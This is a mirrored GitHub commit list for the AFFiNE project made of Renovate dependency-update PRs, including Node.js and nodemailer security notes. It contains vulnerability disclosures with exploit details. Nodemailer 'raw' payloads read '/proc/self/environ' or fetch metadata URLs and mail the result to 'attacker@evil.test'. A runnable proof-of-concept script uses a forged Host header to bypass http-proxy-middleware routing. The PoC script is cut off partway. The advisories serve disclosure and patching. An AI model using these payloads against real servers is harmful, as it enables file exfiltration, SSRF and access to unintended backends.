mirror of
https://github.com/toeverything/AFFiNE.git
synced 2026-07-01 17:50:50 +08:00
7e100d1c624ac70dd4201d30f024863283636ac2
11335 Commits
| Author | SHA1 | Message | Date | |
|---|---|---|---|---|
|
|
7e100d1c62 |
chore: bump up Node.js to v22.23.0 (#15142)
This PR contains the following updates: | Package | Update | Change | |---|---|---| | [node](https://nodejs.org) ([source](https://redirect.github.com/nodejs/node)) | minor | `22.22.3` → `22.23.0` | --- ### Release Notes <details> <summary>nodejs/node (node)</summary> ### [`v22.23.0`](https://redirect.github.com/nodejs/node/releases/tag/v22.23.0): 2026-06-18, Version 22.23.0 'Jod' (LTS), @​aduh95 [Compare Source](https://redirect.github.com/nodejs/node/compare/v22.22.3...v22.23.0) This is a security release. ##### Notable Changes - (CVE-2026-48618) tls: normalize hostname for server identity checks (Matteo Collina) – High - (CVE-2026-48933) crypto: guard WebCrypto cipher output length (Filip Skokan) – High - (CVE-2026-48937) deps: fix integration issues with the latest nghttp2 – Medium - (CVE-2026-48930) dns,net: reject hostnames with embedded NUL bytes (Matteo Collina) – Medium - (CVE-2026-48619) http2: cap originSet size to prevent unbounded memory growth (Matteo Collina) – Medium - (CVE-2026-48615) lib,test: redact proxy credentials in tunnel errors (Matteo Collina) – Medium - (CVE-2026-48934) tls: bind reusable sessions to authenticated host (Matteo Collina) – Medium - (CVE-2026-48928) tls: fix case-sensitive SNI context matching (Matteo Collina) – Medium - (CVE-2026-48617) permission: handle process.chdir on writereport (RafaelGSS) – Low - (CVE-2026-48931) http: fix response queue poisoning in http.Agent (Matteo Collina) – Low - (CVE-2026-48935) permission: disable FileHandle utimes with permission model (RafaelGSS) – Low ##### Commits - \[[`38b4c5ed51`](https://redirect.github.com/nodejs/node/commit/38b4c5ed51)] - **(CVE-2026-48933)** **crypto**: guard WebCrypto cipher output length (Filip Skokan) [nodejs-private/node-private#878](https://redirect.github.com/nodejs-private/node-private/pull/878) - \[[`ad8a10c1bb`](https://redirect.github.com/nodejs/node/commit/ad8a10c1bb)] - **deps**: update llhttp to 9.4.2 (Antoine du Hamel) [nodejs-private/node-private#890](https://redirect.github.com/nodejs-private/node-private/pull/890) - \[[`ca825a87cc`](https://redirect.github.com/nodejs/node/commit/ca825a87cc)] - **deps**: update undici to 6.27.0 (aduh95) [#​63711](https://redirect.github.com/nodejs/node/pull/63711) - \[[`a1a5bb9683`](https://redirect.github.com/nodejs/node/commit/a1a5bb9683)] - **(CVE-2026-48937)** **deps**: fix integration issues with the latest nghttp2 (Tim Perry) [#​62891](https://redirect.github.com/nodejs/node/pull/62891) - \[[`0f48583512`](https://redirect.github.com/nodejs/node/commit/0f48583512)] - **(SEMVER-MAJOR)** **deps**: update nghttp2 to 1.69.0 (Node.js GitHub Bot) [#​62891](https://redirect.github.com/nodejs/node/pull/62891) - \[[`38c869fc05`](https://redirect.github.com/nodejs/node/commit/38c869fc05)] - **deps**: update nghttp2 to 1.68.0 (nodejs-github-bot) [#​61136](https://redirect.github.com/nodejs/node/pull/61136) - \[[`290667c84f`](https://redirect.github.com/nodejs/node/commit/290667c84f)] - **deps**: update nghttp2 to 1.67.1 (nodejs-github-bot) [#​59790](https://redirect.github.com/nodejs/node/pull/59790) - \[[`c9f3da76aa`](https://redirect.github.com/nodejs/node/commit/c9f3da76aa)] - **deps**: update nghttp2 to 1.66.0 (Node.js GitHub Bot) [#​58786](https://redirect.github.com/nodejs/node/pull/58786) - \[[`60890be563`](https://redirect.github.com/nodejs/node/commit/60890be563)] - **deps**: update nghttp2 to 1.65.0 (Node.js GitHub Bot) [#​57269](https://redirect.github.com/nodejs/node/pull/57269) - \[[`5024c7d5d8`](https://redirect.github.com/nodejs/node/commit/5024c7d5d8)] - **deps**: update archs files for openssl-3.5.7 (Node.js GitHub Bot) [#​63820](https://redirect.github.com/nodejs/node/pull/63820) - \[[`7f4eb5af2e`](https://redirect.github.com/nodejs/node/commit/7f4eb5af2e)] - **deps**: upgrade openssl sources to openssl-3.5.7 (Node.js GitHub Bot) [#​63820](https://redirect.github.com/nodejs/node/pull/63820) - \[[`ebb4ec78a8`](https://redirect.github.com/nodejs/node/commit/ebb4ec78a8)] - **deps**: fix aix implicit declaration in OpenSSL (Abdirahim Musse) [#​62656](https://redirect.github.com/nodejs/node/pull/62656) - \[[`5763d40826`](https://redirect.github.com/nodejs/node/commit/5763d40826)] - **deps**: update llhttp to 9.4.1 (Node.js GitHub Bot) [#​63045](https://redirect.github.com/nodejs/node/pull/63045) - \[[`c551a51d0c`](https://redirect.github.com/nodejs/node/commit/c551a51d0c)] - **(CVE-2026-48930)** **dns,net**: reject hostnames with embedded NUL bytes (Matteo Collina) [nodejs-private/node-private#868](https://redirect.github.com/nodejs-private/node-private/pull/868) - \[[`0a22d40180`](https://redirect.github.com/nodejs/node/commit/0a22d40180)] - **(CVE-2026-48931)** **http**: fix response queue poisoning in http.Agent (Matteo Collina) [nodejs-private/node-private#846](https://redirect.github.com/nodejs-private/node-private/pull/846) - \[[`c79968e108`](https://redirect.github.com/nodejs/node/commit/c79968e108)] - **(CVE-2026-48619)** **http2**: cap originSet size to prevent unbounded memory growth (Matteo Collina) [nodejs-private/node-private#855](https://redirect.github.com/nodejs-private/node-private/pull/855) - \[[`0c37bff2ff`](https://redirect.github.com/nodejs/node/commit/0c37bff2ff)] - **http2**: fix DEP0194 message (KaKa) [#​58669](https://redirect.github.com/nodejs/node/pull/58669) - \[[`ea5dc6b529`](https://redirect.github.com/nodejs/node/commit/ea5dc6b529)] - **(SEMVER-MAJOR)** **http2**: remove support for priority signaling (Matteo Collina) [#​58293](https://redirect.github.com/nodejs/node/pull/58293) - \[[`9b6af26132`](https://redirect.github.com/nodejs/node/commit/9b6af26132)] - **(CVE-2026-48615)** **lib,test**: redact proxy credentials in tunnel errors (Matteo Collina) [nodejs-private/node-private#867](https://redirect.github.com/nodejs-private/node-private/pull/867) - \[[`28dcd38864`](https://redirect.github.com/nodejs/node/commit/28dcd38864)] - **(CVE-2026-48935)** **permission**: disable FileHandle utimes with permission model (RafaelGSS) [nodejs-private/node-private#873](https://redirect.github.com/nodejs-private/node-private/pull/873) - \[[`2f62693801`](https://redirect.github.com/nodejs/node/commit/2f62693801)] - **(CVE-2026-48617)** **permission**: handle process.chdir on writereport (RafaelGSS) [nodejs-private/node-private#870](https://redirect.github.com/nodejs-private/node-private/pull/870) - \[[`1662a3ea09`](https://redirect.github.com/nodejs/node/commit/1662a3ea09)] - **test**: add session reuse host verification regressions (Matteo Collina) [nodejs-private/node-private#854](https://redirect.github.com/nodejs-private/node-private/pull/854) - \[[`718d5d0e2c`](https://redirect.github.com/nodejs/node/commit/718d5d0e2c)] - **test**: skip `test-fs-utimes-y2K38` on armv7 (Richard Lau) [#​63836](https://redirect.github.com/nodejs/node/pull/63836) - \[[`041185b61f`](https://redirect.github.com/nodejs/node/commit/041185b61f)] - **test**: skip test-cluster-dgram-reuse on AIX 7.3 (Stewart X Addison) [#​62238](https://redirect.github.com/nodejs/node/pull/62238) - \[[`fd890ba01d`](https://redirect.github.com/nodejs/node/commit/fd890ba01d)] - **(CVE-2026-48934)** **tls**: bind reusable sessions to authenticated host (Matteo Collina) [nodejs-private/node-private#854](https://redirect.github.com/nodejs-private/node-private/pull/854) - \[[`39d1d09684`](https://redirect.github.com/nodejs/node/commit/39d1d09684)] - **(CVE-2026-48928)** **tls**: fix case-sensitive SNI context matching (Matteo Collina) [nodejs-private/node-private#857](https://redirect.github.com/nodejs-private/node-private/pull/857) - \[[`2197a47144`](https://redirect.github.com/nodejs/node/commit/2197a47144)] - **(CVE-2026-48618)** **tls**: normalize hostname for server identity checks (Matteo Collina) [nodejs-private/node-private#869](https://redirect.github.com/nodejs-private/node-private/pull/869) </details> --- ### Configuration 📅 **Schedule**: (UTC) - Branch creation - At any time (no schedule defined) - Automerge - At any time (no schedule defined) 🚦 **Automerge**: Disabled by config. Please merge this manually once you are satisfied. ♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox. 🔕 **Ignore**: Close this PR and you won't be reminded about this update again. --- - [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check this box --- This PR was generated by [Mend Renovate](https://mend.io/renovate/). View the [repository job log](https://developer.mend.io/github/toeverything/AFFiNE). <!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiI0My4yMzEuMSIsInVwZGF0ZWRJblZlciI6IjQzLjIzMS4xIiwidGFyZ2V0QnJhbmNoIjoiY2FuYXJ5IiwibGFiZWxzIjpbImRlcGVuZGVuY2llcyJdfQ==--> Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com> |
||
|
|
f44a7978d9 |
fix(server): query & backfill perf (#15144)
#### PR Dependency Tree * **PR #15144** 👈 This tree was auto-generated by [Charcoal](https://github.com/danerwilliams/charcoal) <!-- This is an auto-generated comment: release notes by coderabbit.ai --> ## Summary by CodeRabbit * **New Features** * Document history retention is now explicitly controlled via caller-provided max-age parameters during pending doc compaction. * **Improvements** * Quota state backfilling/reconciliation was improved to reduce unnecessary work and ensure missing quota states are created in batches. * Permission context loading now more strictly respects “known” vs “stale” quota runtime state. * **Bug Fixes** * Workspace member responses now populate invite IDs correctly from the nested user information. <!-- end of auto-generated comment: release notes by coderabbit.ai --> |
||
|
|
fa488aee64 |
chore: bump up apple/swift-collections version to from: "1.6.0" (#15136)
This PR contains the following updates: | Package | Update | Change | |---|---|---| | [apple/swift-collections](https://redirect.github.com/apple/swift-collections) | minor | `from: "1.5.1"` → `from: "1.6.0"` | --- ### Release Notes <details> <summary>apple/swift-collections (apple/swift-collections)</summary> ### [`v1.6.0`](https://redirect.github.com/apple/swift-collections/releases/tag/1.6.0): Swift Collections 1.6.0 [Compare Source](https://redirect.github.com/apple/swift-collections/compare/1.5.1...1.6.0) This is a feature release adding several useful operations to ordered collections, as well as shipping bug fixes that landed since 1.5.1. The list of supported Swift toolchain versions remains 6.0, 6.1, 6.2, and 6.3 for now. Note that we intend to retire support for Swift 6.0 and 6.1 in a subsequent release later this year. #### New `OrderedCollections` operations We now have several new operations that move existing elements in an `OrderedSet` or `OrderedDictionary` to a new position within the same collection: - `OrderedSet.moveSubrange(_:to:)` and `OrderedDictionary.moveSubrange(_:to:)` move items at a range of indices to just before the item at the specified destination index. - `OrderedSet.move(members:to:)` and `OrderedDictionary.move(keys:to:)` relocate elements identified by value (or key), preserving the order in which they're listed. - `OrderedSet.move(indices:to:)` and `OrderedDictionary.move(indices:to:)` relocate items at an arbitrary sequence of indices, preserving their listed order. #### Bugfixes - `SortedCollections` \[with the `UnstableSortedCollections` trait]: The default capacity of B-tree nodes is no longer clamped at 16, improving performance. ([#​257](https://redirect.github.com/apple/swift-collections/issues/257)) - `DequeModule`: The ownership-aware `RigidDeque` and `UniqueDeque` types no longer hand out invalid spans to clients ([#​659](https://redirect.github.com/apple/swift-collections/issues/659)) - `ContainersPreview` \[with the `UnstableContainersPreview` trait]: The deprecated `Borrow` type alias is now declared with correct availability. ([#​655](https://redirect.github.com/apple/swift-collections/issues/655)) #### What's Changed - Add missing availability to Borrow by [@​guoye-zhang](https://redirect.github.com/guoye-zhang) in [#​655](https://redirect.github.com/apple/swift-collections/pull/655) - \[InternalCollectionsUtilities] Fix \_trim returning the wrong buffer region by [@​adityasingh2400](https://redirect.github.com/adityasingh2400) in [#​659](https://redirect.github.com/apple/swift-collections/pull/659) - \[SortedCollections] Fix \_BTree default node capacity capping at 16 by [@​adityasingh2400](https://redirect.github.com/adityasingh2400) in [#​661](https://redirect.github.com/apple/swift-collections/pull/661) - Small benchmarking improvements by [@​lorentey](https://redirect.github.com/lorentey) in [#​664](https://redirect.github.com/apple/swift-collections/pull/664) - \[OrderedCollections] Add move operations by [@​dnadoba](https://redirect.github.com/dnadoba) in [#​660](https://redirect.github.com/apple/swift-collections/pull/660) - 1.6.0 prerelease cleanups by [@​lorentey](https://redirect.github.com/lorentey) in [#​665](https://redirect.github.com/apple/swift-collections/pull/665) #### New Contributors - [@​guoye-zhang](https://redirect.github.com/guoye-zhang) made their first contribution in [#​655](https://redirect.github.com/apple/swift-collections/pull/655) - [@​adityasingh2400](https://redirect.github.com/adityasingh2400) made their first contribution in [#​659](https://redirect.github.com/apple/swift-collections/pull/659) **Full Changelog**: <https://github.com/apple/swift-collections/compare/1.5.1...1.6.0> </details> --- ### Configuration 📅 **Schedule**: (UTC) - Branch creation - At any time (no schedule defined) - Automerge - At any time (no schedule defined) 🚦 **Automerge**: Disabled by config. Please merge this manually once you are satisfied. ♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox. 🔕 **Ignore**: Close this PR and you won't be reminded about this update again. --- - [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check this box --- This PR was generated by [Mend Renovate](https://mend.io/renovate/). View the [repository job log](https://developer.mend.io/github/toeverything/AFFiNE). <!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiI0My4yMzEuMSIsInVwZGF0ZWRJblZlciI6IjQzLjIzMS4xIiwidGFyZ2V0QnJhbmNoIjoiY2FuYXJ5IiwibGFiZWxzIjpbImRlcGVuZGVuY2llcyJdfQ==--> Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com>v2026.6.22-canary.1054 |
||
|
|
bb8454e7e1 | refactor(native): cache & job runtime (#15139) | ||
|
|
7ea8800c99 |
chore: bump up nodemailer version to v9 [SECURITY] (#15134)
This PR contains the following updates: | Package | Change | [Age](https://docs.renovatebot.com/merge-confidence/) | [Confidence](https://docs.renovatebot.com/merge-confidence/) | |---|---|---|---| | [nodemailer](https://nodemailer.com/) ([source](https://redirect.github.com/nodemailer/nodemailer)) | [`^8.0.11` → `^9.0.0`](https://renovatebot.com/diffs/npm/nodemailer/8.0.11/9.0.1) |  |  | --- ### Nodemailer: Message-level raw option bypasses disableFileAccess/disableUrlAccess, enabling arbitrary file read and full-response SSRF in the delivered message [GHSA-p6gq-j5cr-w38f](https://redirect.github.com/advisories/GHSA-p6gq-j5cr-w38f) <details> <summary>More information</summary> #### Details ##### Message-level `raw` option bypasses `disableFileAccess` / `disableUrlAccess`, enabling arbitrary file read and full-response SSRF in the sent message - **Target:** nodemailer/nodemailer, npm `nodemailer` **v9.0.0** (HEAD `4e58450eb490e5097a74b2b2cce35a8d9e21856e`) - **Verdict:** CONFIRMED (local PoC, no network) ##### Summary Nodemailer exposes `disableFileAccess` and `disableUrlAccess` so an application that passes **untrusted** message data to the library can forbid that data from reading local files or fetching URLs. Every attachment, alternative, `html`/`text`/`watchHtml`/`amp` and `icalEvent` content node honors these flags. **The message-level `raw` option does not.** `MailComposer.compile()` builds the root MIME node for a `raw` message **without** threading the two flags, so a `raw: { path: '/etc/passwd' }` or `raw: { href: 'http://169.254.169.254/…' }` message is read / fetched anyway, and the file or HTTP-response bytes become the **actual message that is sent** by every transport (SMTP, SES, sendmail, stream, JSON). An actor whose input the application intended to sandbox therefore obtains arbitrary local-file disclosure and a full-response SSRF primitive, delivered to a recipient the same actor can choose. This is the same vulnerability class as the already-published jsonTransport advisory **GHSA-wqvq-jvpq-h66f**, but a **distinct code path** (`raw` root node, not `normalize()`), and strictly higher impact: the jsonTransport bug only affected the locally-returned JSON, whereas this affects the delivered RFC822 message for all transports. ##### Affected component - `lib/mail-composer/index.js:34-35` — root cause: ```js if (this.mail.raw) { this.message = new MimeNode('message/rfc822', { newline: this.mail.newline }).setRaw(this.mail.raw); } ``` The `MimeNode` is constructed with only `{ newline }`. Compare the sibling node builders `_createMixed`/`_createAlternative`/`_createRelated`/`_createContentNode` (`lib/mail-composer/index.js:389-527`), which all pass `disableUrlAccess: this.mail.disableUrlAccess, disableFileAccess: this.mail.disableFileAccess`. - `lib/mime-node/index.js:51-52` — the constructor derives `this.disableFileAccess`/ `this.disableUrlAccess` solely from its own `options`; children do **not** inherit a parent's flags (`createChild`/`appendChild`, lines 175-194, pass options through verbatim). - `lib/mime-node/index.js:812` — `setRaw()` content is resolved through `this._getStream(this._raw)`. - `lib/mime-node/index.js:984-1010` — `_getStream` reads the file (`fs.createReadStream`, 995) or fetches the URL (`nmfetch`, 1009) **only guarded by `this.disableFileAccess`/`this.disableUrlAccess`**, which on the `raw` root node are `false`. - Reached from the normal send flow at `lib/mailer/index.js:188` (`mail.message = new MailComposer(mail.data).compile()`), so every transport is affected. ##### Reachability gate (hop-by-hop) 1. **Source.** Application calls `transporter.sendMail({ raw: <userControlled> , to: <userControlled> })` with `disableFileAccess: true` and/or `disableUrlAccess: true` configured on the transporter (forced onto `mail.data` in `lib/mailer/mail-message.js:36-40`) or per message. This is the exact scenario the flags exist for — the same precondition under which GHSA-wqvq-jvpq-h66f was accepted. 2. **Guard — the access flags.** For attachments the flag is enforced: a node created by `_createContentNode` carries `disableFileAccess`, so `_getStream` throws `EFILEACCESS`. **Bypass:** the `raw` branch (`compile():34-35`) never sets the flag on its node, so `this.disableFileAccess === false` and the guard at `mime-node:985` / `:999` is skipped. There is no other validation between `mail.raw` and the read; `raw` content shapes (`{path}`, `{href}`, stream, string, buffer) are accepted as-is by `setRaw`/`_getStream`. 3. **Sink.** `fs.createReadStream(content.path)` (file disclosure) or `nmfetch(content.href, …)` (SSRF). The resulting bytes are emitted as the message body by `createReadStream()`, which every transport pipes to its destination (`smtp-transport:233`, `smtp-pool/pool-resource:208`, `ses-transport:96`, `sendmail-transport:184`, `stream-transport:67`). No guard blocks the chain; the only guard (the access flags) is structurally absent on this node. ##### Root cause Inconsistent enforcement: the access policy is applied per-`MimeNode` via constructor options and must be re-passed at every node creation. The `raw`-message shortcut in `compile()` omits it, while all five other node builders include it. The flags are therefore enforced for every content type *except* the one that lets the caller supply a complete message body by path/URL. ##### Exploit path Application that sandboxes untrusted mail input (`disableFileAccess`/`disableUrlAccess` set): 1. Untrusted actor supplies `raw: { path: '/proc/self/environ' }` (or any server file: `/app/.env`, key material, etc.) and `to: attacker@evil.test`. 2. `compile()` builds the raw root node without the flags; the transport reads the file and sends its contents as the message → **arbitrary server-file exfiltration to an attacker-chosen mailbox.** 3. Alternatively `raw: { href: 'http://127.0.0.1:8080/admin' }` or a cloud metadata URL → Nodemailer fetches it server-side and delivers the full response body in the email → **full-response SSRF** (no blind-channel limitation). ##### Impact - **Confidentiality (High):** arbitrary local file read disclosed in the outgoing message; full-response SSRF to internal/metadata endpoints, also disclosed in the message. - **Integrity (Low):** attacker-fetched/file content is injected into the delivered mail. - The two protective flags an application relies on to contain untrusted input are silently ineffective for `raw`. ##### Preconditions The application (a) passes `disableFileAccess` and/or `disableUrlAccess` (the documented sandboxing flags) and (b) lets untrusted input influence the `raw` field (and, for maximal disclosure, `to`). No other configuration is required; all bundled transports are affected. This mirrors the accepted precondition of GHSA-wqvq-jvpq-h66f. ##### Severity - **AV** — message data routinely originates over the network in the apps these flags protect. - **AC** — a single crafted `raw` object; deterministic. - **PR** — the actor is a user whose input the app already treats as untrusted (the reason the flags are set); not fully anonymous in the typical deployment. - **UI** — no victim interaction. - **S** — impact within Nodemailer's process scope. - **C** — arbitrary file read **and** full-response SSRF, both delivered to an attacker-chosen recipient. (The sibling jsonTransport advisory used C:L because its leak stayed in locally-returned JSON; here the bytes leave the system in the sent message, so C:H is warranted.) - **I** — attacker injects fetched/file bytes into the outgoing message. - **A**. Note: if a deployment fixes the recipient (`to` not attacker-controlled) the disclosure channel narrows and the rating degrades toward the sibling's Medium; the High rating reflects the reasonable worst case where `raw` and `to` are both untrusted. ##### Adversarial re-read (attempts to refute) 1. **"`raw` content is by-design trusted, so the flags shouldn't apply."** Rejected: every other content path (attachments, alternatives, html/text, icalEvent) honors the flags, and the maintainer already accepted GHSA-wqvq-jvpq-h66f for exactly this "untrusted input + flag set" model. The asymmetry — attachment `{path}` is blocked but `raw:{path}` is not — is the bug, and the PoC's CONTROL case proves the flag is otherwise effective on the same file. 2. **"The raw node inherits the flags via rootNode."** Rejected by code and by PoC: `compile():35` constructs the node with `{ newline }` only; `MimeNode` constructor sets `this.disableFileAccess = !!options.disableFileAccess` → `false`; `rootNode` is itself; no inheritance exists. 3. **"The PoC leaks for an unrelated reason."** Rejected: the CONTROL message (`attachments:[{path}]`, same file, same transporter) returns `EFILEACCESS`; only the `raw:{path}` message leaks. The sentinel nonce exists solely in the temp file; the URL nonce is generated server-side and is only obtainable by an actual fetch. Both observables are uniquely bound to the bypass. 4. **"Maybe only jsonTransport (already reported) is affected."** Rejected: the PoC uses `streamTransport` and the root cause is in `MailComposer.compile()` (`mailer:188`), shared by all transports; jsonTransport is a different (already-fixed) path. I could not find any guard that blocks the chain; the finding survives. ##### Proof of concept (safe, benign) `findings/nodemailer/raw/poc-raw-fileaccess-bypass.js` — local, no network egress (loopback only), no destructive action. Output: ``` [CONTROL] attachment path with disableFileAccess: BLOCKED (EFILEACCESS) — flag works here [ATTACK] raw:{path} with disableFileAccess=true: BYPASSED — sentinel file CONTENT present in message [ATTACK] raw:{href} with disableUrlAccess=true (loopback server): BYPASSED — fetched body present (SSRF) VERDICT: CONFIRMED ``` Run: `node findings/nodemailer/raw/poc-raw-fileaccess-bypass.js` (exit 0 = confirmed). ##### Remediation Thread the access policy onto the `raw` root node, exactly as the other builders do: ```js if (this.mail.raw) { this.message = new MimeNode('message/rfc822', { newline: this.mail.newline, disableFileAccess: this.mail.disableFileAccess, disableUrlAccess: this.mail.disableUrlAccess }).setRaw(this.mail.raw); } ``` (Defense in depth: `setRaw`/`_getStream` could also refuse `{path}`/`{href}` raw content when either flag is set, regardless of how the node was constructed.) Add a regression test asserting that `raw:{path}` and `raw:{href}` reject with `EFILEACCESS`/`EURLACCESS` when the flags are set, mirroring the attachment tests. #### Severity - CVSS Score: 7.1 / 10 (High) - Vector String: `CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:N` #### References - [https://github.com/nodemailer/nodemailer/security/advisories/GHSA-p6gq-j5cr-w38f](https://redirect.github.com/nodemailer/nodemailer/security/advisories/GHSA-p6gq-j5cr-w38f) - [https://github.com/advisories/GHSA-p6gq-j5cr-w38f](https://redirect.github.com/advisories/GHSA-p6gq-j5cr-w38f) This data is provided by the [GitHub Advisory Database](https://redirect.github.com/advisories/GHSA-p6gq-j5cr-w38f) ([CC-BY 4.0](https://redirect.github.com/github/advisory-database/blob/main/LICENSE.md)). </details> --- ### Release Notes <details> <summary>nodemailer/nodemailer (nodemailer)</summary> ### [`v9.0.1`](https://redirect.github.com/nodemailer/nodemailer/blob/HEAD/CHANGELOG.md#901-2026-06-17) [Compare Source](https://redirect.github.com/nodemailer/nodemailer/compare/v9.0.0...v9.0.1) ##### Bug Fixes - enforce disableFileAccess/disableUrlAccess for raw message option ([a82e060](https://redirect.github.com/nodemailer/nodemailer/commit/a82e060d978f27e5f41369a9a9807b1e3dedc2e2)) ### [`v9.0.0`](https://redirect.github.com/nodemailer/nodemailer/blob/HEAD/CHANGELOG.md#900-2026-06-14) [Compare Source](https://redirect.github.com/nodemailer/nodemailer/compare/v8.0.11...v9.0.0) ##### ⚠ BREAKING CHANGES - HTTPS requests made while fetching remote content (attachment href/path URLs, OAuth2 token endpoints, HTTP/HTTPS proxy CONNECT) now validate the server's TLS certificate by default. Requests to hosts with self-signed, expired, or hostname-mismatched certificates that previously succeeded will now fail. Opt back out per request with tls.rejectUnauthorized=false (transport options, or a per-attachment `tls` option). ##### Bug Fixes - replace deprecated url.parse with a WHATWG URL wrapper ([0c080fb](https://redirect.github.com/nodemailer/nodemailer/commit/0c080fbf3278926f013a5c2ad06f5f6f0e18f5ed)) - validate TLS certificates by default when fetching remote content ([6a947ac](https://redirect.github.com/nodemailer/nodemailer/commit/6a947ac7114a16da1e6a50d9a6f4e17026ce145d)) </details> --- ### Configuration 📅 **Schedule**: (UTC) - Branch creation - At any time (no schedule defined) - Automerge - At any time (no schedule defined) 🚦 **Automerge**: Disabled by config. Please merge this manually once you are satisfied. ♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox. 🔕 **Ignore**: Close this PR and you won't be reminded about this update again. --- - [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check this box --- This PR was generated by [Mend Renovate](https://mend.io/renovate/). View the [repository job log](https://developer.mend.io/github/toeverything/AFFiNE). <!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiI0My4yMzEuMSIsInVwZGF0ZWRJblZlciI6IjQzLjIzMS4xIiwidGFyZ2V0QnJhbmNoIjoiY2FuYXJ5IiwibGFiZWxzIjpbImRlcGVuZGVuY2llcyJdfQ==--> Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com>v2026.6.20-canary.1001 |
||
|
|
16196c6ca1 |
chore: bump up http-proxy-middleware version to v3.0.7 [SECURITY] (#15131)
This PR contains the following updates: | Package | Change | [Age](https://docs.renovatebot.com/merge-confidence/) | [Confidence](https://docs.renovatebot.com/merge-confidence/) | |---|---|---|---| | [http-proxy-middleware](https://redirect.github.com/chimurai/http-proxy-middleware) | [`3.0.5` → `3.0.7`](https://renovatebot.com/diffs/npm/http-proxy-middleware/3.0.5/3.0.7) |  |  | --- ### http-proxy-middleware `router` host+path substring matching allows Host-header-driven backend routing bypass [CVE-2026-55602](https://nvd.nist.gov/vuln/detail/CVE-2026-55602) / [GHSA-64mm-vxmg-q3vj](https://redirect.github.com/advisories/GHSA-64mm-vxmg-q3vj) <details> <summary>More information</summary> #### Details ##### Summary `http-proxy-middleware` documents `router` proxy-table entries as host, path, or host+path selectors, but the host+path implementation uses unanchored substring matching on attacker-controlled request metadata. As a result, a crafted `Host` header that is only a superstring match for a configured host+path key can still route a request to an unintended backend. ##### Details Tested code state: - validated on tag `v4.0.0-beta.5` - corresponding commit: `339f09ede860197807d4fd99ed9020fa5d0bd358` Relevant code locations: - `src/router.ts` - `src/http-proxy-middleware.ts` Affected public API: - `createProxyMiddleware({ router: { 'host/path': 'http://target' } })` Code explanation: When a proxy-table router key contains `/`, `getTargetFromProxyTable()` concatenates attacker-controlled `req.headers.host` and `req.url` into a single `hostAndPath` string, then accepts the route if: ```ts hostAndPath.indexOf(key) > -1 ``` That is a substring test, not an exact host match plus intended path match. In the validated PoC, the configured router key is: ```txt localhost:3000/api ``` but the attacker-controlled host is: ```txt evillocalhost:3000 ``` and the request path is: ```txt /api ``` The concatenated attacker-controlled string: ```txt evillocalhost:3000/api ``` still contains the configured router key as a substring, so the middleware selects the alternate backend even though the host is not equal to the configured host. Exploit path: 1. the application enables the documented proxy-table `router` feature with at least one host+path rule 2. an external attacker sends an ordinary HTTP request with a crafted `Host` header 3. `HttpProxyMiddleware.prepareProxyRequest()` applies router selection before proxying 4. `getTargetFromProxyTable()` accepts the crafted `Host + path` string through substring matching 5. the request is proxied to the wrong backend ##### PoC Create these files in the same working directory and run: ```bash bash ./run.sh ``` ##### File: `run.sh` ```bash #!/usr/bin/env bash set -euo pipefail SCRIPT_DIR="$(cd "$(dirname "${BASH_SOURCE[0]}")" && pwd)" REPO_URL="https://github.com/chimurai/http-proxy-middleware.git" REPO_REF="v4.0.0-beta.5" WORKDIR="$(mktemp -d "${SCRIPT_DIR}/.tmp-repro.XXXXXX")" TARGET_REPO_DIR="${WORKDIR}/repo" REPRO_DIR="${WORKDIR}/reproduction" IMAGE_TAG="http-proxy-middleware-router-bypass-poc" cleanup() { rm -rf "${WORKDIR}" } trap cleanup EXIT echo "[a3] cloning target repository" git clone --quiet "${REPO_URL}" "${TARGET_REPO_DIR}" git -C "${TARGET_REPO_DIR}" checkout --quiet "${REPO_REF}" mkdir -p "${REPRO_DIR}" cp "${SCRIPT_DIR}/Dockerfile" "${WORKDIR}/Dockerfile" cp "${SCRIPT_DIR}/verify.mjs" "${REPRO_DIR}/verify.mjs" echo "[a3] building reproduction image" docker build -f "${WORKDIR}/Dockerfile" -t "${IMAGE_TAG}" "${WORKDIR}" echo "[a3] running verification" docker run --rm "${IMAGE_TAG}" node /work/reproduction/verify.mjs ``` ##### File: `Dockerfile` ```Dockerfile FROM node:22-bullseye WORKDIR /work COPY repo/package.json repo/yarn.lock /work/repo/ RUN corepack enable \ && cd /work/repo \ && yarn install --frozen-lockfile COPY repo /work/repo RUN cd /work/repo && yarn build COPY reproduction /work/reproduction ``` ##### File: `verify.mjs` ```js import http from 'node:http'; import fs from 'node:fs'; import assert from 'node:assert/strict'; import { createProxyMiddleware } from '/work/repo/dist/index.js'; const ROUTER_KEY = 'localhost:3000/api'; const CRAFTED_HOST = 'evillocalhost:3000'; function listen(server, port) { return new Promise((resolve) => { server.listen(port, '127.0.0.1', () => resolve()); }); } function close(server) { return new Promise((resolve, reject) => { server.close((err) => { if (err) { reject(err); return; } resolve(); }); }); } function request(path, host) { return new Promise((resolve, reject) => { const req = http.request( { host: '127.0.0.1', port: 3000, path, method: 'GET', headers: { Host: host, }, }, (res) => { let data = ''; res.setEncoding('utf8'); res.on('data', (chunk) => { data += chunk; }); res.on('end', () => { resolve({ statusCode: res.statusCode, body: data }); }); }, ); req.on('error', reject); req.end(); }); } const defaultBackend = http.createServer((req, res) => { res.end('DEFAULT'); }); const secretBackend = http.createServer((req, res) => { res.end('SECRET'); }); const proxyMiddleware = createProxyMiddleware({ target: 'http://127.0.0.1:3101', router: { [ROUTER_KEY]: 'http://127.0.0.1:3102', }, }); const proxyServer = http.createServer((req, res) => { proxyMiddleware(req, res, () => { res.statusCode = 404; res.end('NO_PROXY'); }); }); try { assert.ok(fs.existsSync('/work/repo/dist/index.js')); assert.ok(fs.existsSync('/work/reproduction/verify.mjs')); await listen(defaultBackend, 3101); await listen(secretBackend, 3102); await listen(proxyServer, 3000); console.log('STEP start-services ok'); const baseline = await request('/api', 'safe.example:3000'); assert.equal(baseline.statusCode, 200); 